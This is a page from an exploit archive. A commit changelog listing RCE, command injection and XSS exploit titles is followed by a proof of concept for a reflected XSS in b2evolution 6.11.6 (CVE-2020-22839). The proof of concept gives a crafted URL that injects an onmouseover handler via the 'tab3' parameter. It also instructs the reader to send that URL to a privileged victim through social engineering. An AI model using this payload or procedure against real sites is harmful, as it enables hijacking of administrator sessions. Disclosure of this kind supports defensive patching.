b96bdbcfa5
8 changes to exploits/shellcodes Online Marriage Registration System 1.0 - Remote Code Execution Online Marriage Registration System 1.0 - Remote Code Execution (1) Gitlab 11.4.7 - Remote Code Execution GitLab 11.4.7 - Remote Code Execution (Authenticated) (1) Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated) Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (2) GitLab 11.4.7 - Remote Code Execution (Authenticated) GitLab 11.4.7 - RCE (Authenticated) GitLab 11.4.7 - RCE (Authenticated) (2) Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) (1) PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting b2evolution 6.11.6 - 'redirect_to' Open Redirect b2evolution 6.11.6 - 'tab3' Reflected XSS Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2) Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)
16 lines
No EOL
883 B
Text
16 lines
No EOL
883 B
Text
# Exploit Title: b2evolution 6.11.6 - 'tab3' Reflected XSS
|
||
# CVE: CVE-2020-22839
|
||
# Date: 10/02/2021
|
||
# Exploit Author: Nakul Ratti, Soham Bakore
|
||
# Vendor Homepage: https://b2evolution.net/
|
||
# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405
|
||
# Version: 6.11.6
|
||
# Tested on: latest version of Chrome, Firefox on Windows and Linux
|
||
|
||
--------------------------Proof of Concept-----------------------
|
||
|
||
Steps to Reproduce:
|
||
|
||
1. Send the following URL http://HOST/evoadm.php?.ctrl=comments&filter=restore&tab3=123%22onmouseover=%22alert(document.domain)%22&blog=1&blog=1 to the logged in victim using any social engineering technique.
|
||
2. When an unsuspecting user with high privileges opens this URL, XSS will be triggered which will execute the malicious javascript payload in users browser.
|
||
3. The vulnerable parameter in this case is “tab3”. |